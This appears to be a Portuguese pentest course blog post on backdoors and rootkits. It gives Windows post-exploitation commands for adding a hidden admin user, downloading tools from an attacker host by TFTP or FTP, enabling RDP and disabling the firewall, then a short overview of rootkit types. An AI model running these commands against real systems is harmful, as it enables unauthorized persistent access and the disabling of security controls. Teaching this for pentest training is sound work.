[0x0D] Backdoors e Rootkits

COMPARTILHAR:

Whatsapp Telegram Twitter Facebook Reddit

Entenda um pouco sobre backdoors e rootkits

 

Este tutorial faz parte do GUIA COMPLETO do professional em Segurança Ofensiva de Software, saiba mais.

Aula 13: Backdoors e Rootkits

13.1 Backdoors

Backdoor significa literalmente "porta dos fundos", um atacante experiente sempre abre um backdoor após conseguir acesso a máquina alvo. Por exemplo ao ter acesso a uma máquina Windows o atacante pode facilmente criar um usuário e assumir a administração do sistema com os comandos abaixo:

[net user usuarioX senhaX /add

net localgroup administrators usuarioX /add]

Assim o atacante pode utilizar ferramentas VNC para poder monitorar e controlar a máquina alvo graficamente. Para isso é necessário instalar um servidor VNC na máquina alvo, desabilitar qualquer opção que possa deixar que o alvo perceba que está rodando um servidor VNC e criar um túnel SSH para poder se conectar a máquina fora da rede local.

Para transferir determinada ferramenta o atacante pode utilizar o TFTP (para arquivos pequenos, pois a transferência é sobre protocolo UDP) ou o FTP (para arquivos grandes, protocolo TCP). O código abaixo exemplifica comandos para transferência da ferramenta presente na máquina do atacante após obter a shell da máquina alvo:

[tftp -i ip_atacante GET nome_ferramenta]

[echo open ip_atacante 21 > ftp.txt

echo usuário >> ftp.txt

echo senha >> ftp.txt

echo bin >> ftp.txt

echo GET nome_ferramenta >> ftp.txt

echo bye >> ftp.txt

ftp -s:ftp.txt]

Em máquina com Internet Explorer também é possível utilizá-lo para baixar a ferramenta, para isso hospede a ferramenta online como .jpg e utilize os comandos abaixo para baixá-la remotamente via linha de comando.

[cd C:\Program Files\Internet Explorer\

start iexplore.exe <jpg_file_complete_http_url>

cd C:\Documents and Settings\<USER>\Local Settings\Temporary

Internet Files\

dir /S

XCOPY <source_complete_file_path> <destination_folder_path> /h /y /c

REN <old_filename> <new_filename>]

O RDP é o protocolo padrão da Microsoft para acesso remoto no qual você pode utilizar como backdoor. Com um usuário administrador habilite o RDP com o comando a seguir.

[net localgroup "Remote Desktop Users" UserLoginName /add

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net start TermService]

Para desabilitar o firewall padrão do Windows basta usar o comando:

[netsh firewall set opmode disable]

Nos Windows recentes o comando é:

[netsh advfirewall set currentprofile state off]

13.2 Rootkits

Rootkits são ferramentas maliciosas utilizada por atacantes para garantir a persistência do atacante às máquinas exploradas tentando se esconder de ferramentas como antivírus e outras. Com as permissões necessárias, rootkits vão tentar:

  • Desativar antivírus.
  • Esconder detalhes de conexão TCP/UDP.
  • Esconder detalhes de processo malicioso.
  • Esconder arquivos específicos.
Alguns tipos de rootkits são:
  • modo usuário, fácil detecção.
  • modo kernel, se escreve no kernel do sistema.
  • se escrever na MBR do disco, Windows 8 e superiores possuem secure boot.
  • ficam na memória, deixa sistema lento temporariamente.
  • se escrever no firmware do hardware, difícil detecção.
Próxima aula, clique aqui.

COMENTÁRIOS

Nome

#ann,25,#HK,30,#LTCode,123,Artigo - Diversos,161,Artigo - Games,200,Artigo - Tecnologia,584,autor-thomaz,7,Coluna - Alternative World,24,Coluna - Fail,12,Coluna - Tec Line,14,Criptomoeda,70,Curiosidades - Diversos,49,Curiosidades - Tecnologia,50,en,2,estudo,8,HN,12,logica,14,Pentest,20,Programar C,29,Programar POO,6,Programar Python,6,Programar Shell,21,Programar verilog,12,Raspberry Pi,15,Redes,3,root,97,Shorty Awards,1,Smartphones - Reviews,33,Teoria,10,Top Nostalgia,2,VPN,18,WhatsApp,46,
ltr
item
Limon Tec: [0x0D] Backdoors e Rootkits
[0x0D] Backdoors e Rootkits
Entenda um pouco sobre backdoors e rootkits
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikJMn5LIEfrtHPEivASNGrjkvEXwlg4pIfsUmJSG3iiHB7Qq2GaWwJER5C7ACwPdzjN3mOJMzZdm6Bafmml93aqYJZ_yJFwmxuidt2RVhJnGRLXV2v545RJExEEpfLRP6o2trej48bX-8CaV9ryot9es4nMq4iCNEvPxcVUu2M8uAvqxo4gECtD5lHKw/w640-h421/limontec_seguranca_ofensiva_software.png
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikJMn5LIEfrtHPEivASNGrjkvEXwlg4pIfsUmJSG3iiHB7Qq2GaWwJER5C7ACwPdzjN3mOJMzZdm6Bafmml93aqYJZ_yJFwmxuidt2RVhJnGRLXV2v545RJExEEpfLRP6o2trej48bX-8CaV9ryot9es4nMq4iCNEvPxcVUu2M8uAvqxo4gECtD5lHKw/s72-w640-c-h421/limontec_seguranca_ofensiva_software.png
Limon Tec
https://www.limontec.com/2023/11/backdoors-rootkits-pentest.html
https://www.limontec.com/
https://www.limontec.com/
https://www.limontec.com/2023/11/backdoors-rootkits-pentest.html
false
2157924926610706248
UTF-8
Carregar todos posts Não encontramos nenhum post VER TUDO Ler mais Responder Cancelar resposta Deletar Por Home PÁGINAS POSTS Ver tudo RECOMENDADO PARA VOCÊ LABEL ARQUIVO SEARCH TODOS POSTS Não encontramos nenhum post relacionado a sua requisição VOLTAR PÁGINA INICIAL Domingo Segunda Terça Quarta Quinta Sexta Sábado Dom Seg Ter Qua Qui Sex Sab Janeiro Fevereiro Março Abril Maio Junho Julho Agosto Setembro Outubro Novembro Dezembro Jan Fev Mar Abr Maio Jun Jul Ago Set Out Nov Dez apenas agora 1 minuto atrás $$1$$ minutes ago 1 hora atrás $$1$$ hours ago Ontem $$1$$ days ago $$1$$ weeks ago mais de 5 semanas atrás Seguidores Seguir ESTE CONTEÚDO ESTÁ BLOQUEADO PASSO 1: Compartilhe com seus amigos PASSO 2: Clique no link compartilhado Copiar Todo Código Selecionar Todo Código Todos códigos foram copiados para seu clipboard Não é possível copiar códigos / textos, por favor aperte [CTRL]+[C] (ou CMD+C no Mac) para copiar Tabela de conteúdo